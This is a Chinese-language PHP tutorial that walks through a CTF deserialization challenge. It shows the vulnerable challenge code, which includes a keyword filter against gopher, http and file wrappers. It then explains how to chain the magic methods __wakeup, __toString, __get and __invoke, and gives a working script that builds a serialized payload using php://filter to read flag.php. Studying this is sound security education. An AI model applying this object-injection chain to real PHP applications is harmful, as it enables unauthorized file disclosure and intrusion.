這篇文章為大家帶來了關於PHP的相關知識,其中主要介紹了關於pop鏈構造的相關問題,pop鍊是一種面向屬性編程,常用於構造調用鏈的方法,下面一起來看一下,希望對大家有幫助。
推薦學習:《PHP影片教學》
隨著對反序列化學習的不斷深入,我們來學習一下pop鏈的構造。這個pop鏈對於我這種小白來說還是比較難理解的,再次寫下這篇文章總結一下,加深自己對構造pop鏈的理解。同時也是提供想要入坑的夥伴們一些理解。
pop鏈構造
一般的反序列化題目,存在漏洞或能注入惡意程式碼的地方在魔術方法中,我們可以透過自動呼叫魔術方法來達到攻擊效果。但是當注入點存在普通的類別方法中,透過前面自動呼叫的方法就失效了,所以我們需要找到普通類與魔術方法之間的聯繫,理出一種邏輯思路,透過這種邏輯思路來構造一條pop鏈,從而達到攻擊的目的。所以我們在做這類pop題目一定要緊盯魔術方法。
pop鏈簡介
它是一種物件導向編程,常用於建構呼叫鏈的方法。在題目中的程式碼裡找到一系列能呼叫的指令,並將這些指令整合成一條有邏輯的能達到惡意攻擊效果的程式碼,就是pop鏈(個人理解,歡迎師傅們提出意見)在構造pop鏈中,魔術方法必不可少。以下將透過一個範例來說pop鍊是怎麼建構的,以及具體建構的想法
上題目程式碼:
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}登入後複製
建構想法
##在建構呼叫鏈時,先找到呼叫鏈的頭和尾。頭一般都是能傳參以及可以反序列化的地方,而尾部一般都是可以執行惡意程式碼的地方。審計這個題的程式碼,頭是用get方式對pop傳參,而尾部是include包含函數。到這裡,我們應該都知道是要用php偽協定讀取flag檔的源碼。既然頭和尾都找到了,也知道攻擊方法了。那麼接下來找到題目中的魔術方法。
__invoke() 当一个类被当作函数执行时调用此方法。
__construct 在创建对象时调用此方法
__toString() 在一个类被当作字符串处理时调用此方法
__wakeup() 当反序列化恢复成对象时调用此方法
__get() 当读取不可访问或不存在的属性的值会被调用
登入後複製
題中一共有這五種魔術方法。接著找出普通類與魔術方法之間的關聯。
不難看出wakeup函數中有個preg_match函數,用於查找source中敏感的字串,我們可以從這裡開頭,將source賦予一個show類,那麼就會自動觸發toString函數,那麼現在就要在tostring方法中延申鍊子,那麼我們可以在totring方法中$this->str賦予test類,在test類讀取source變量,(因為test類中沒有source屬性,則是訪問了不可訪問的屬性)則會自動呼叫get魔術方法。可以發現get方法中有個函數調用,則我們可以將$this->p賦予Modifier類,會自動調用invoke方法,從而執行我們寫入的php偽協議(將Modifer類中的var屬性賦值為我們的惡意程式碼)
至此,我們建構pop鏈。
pop鏈講解
<?php
class Modifier {
protected $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
public $source;
public $str;
function _construct(){
$this->source=$file;
}
}
class Test{
public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>登入後複製
先把用到的類別寫出來,形成一個框架,再表示類別中的變數。分別將用到的類別進行實例化,這裡為什麼要new 兩次show(看程式碼應該能看懂,第一次是實例化show類別,第二次是將第一次實例化後的show類別中的source=第二次實例化的show)
在我們進行序列化的時候盡量用url編碼一下(在這個題中有protected修飾的屬性,會有不可見字元)
推薦學習:《
PHP影片教學》
以上是詳細介紹php反序列化pop鏈構造知識點的詳細內容。更多資訊請關注PHP中文網其他相關文章!
